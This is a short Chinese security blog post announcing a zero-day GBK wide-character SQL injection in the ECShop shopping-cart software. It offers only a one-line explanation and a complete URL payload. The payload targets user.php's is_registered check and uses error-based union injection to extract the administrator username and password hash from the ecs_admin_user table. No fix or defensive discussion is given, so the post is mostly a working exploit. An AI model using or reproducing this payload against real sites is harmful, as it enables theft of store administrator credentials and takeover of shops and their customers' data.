您的位置 » 首页 » 实用工具 » 漏洞播报:ecshop gbk宽字符注入0day漏洞

漏洞播报:ecshop gbk宽字符注入0day漏洞

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年11月04日 | 文章热度:7,614 次 全屏阅读

显示不全请点击全屏阅读

漏洞作者: kelon

详细说明:

ecshop 对宽字符过滤还是不完整。

漏洞证明:

提下以下参数:http://www.xx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

 

Tags:

ecshop宽字节注入,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1583/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)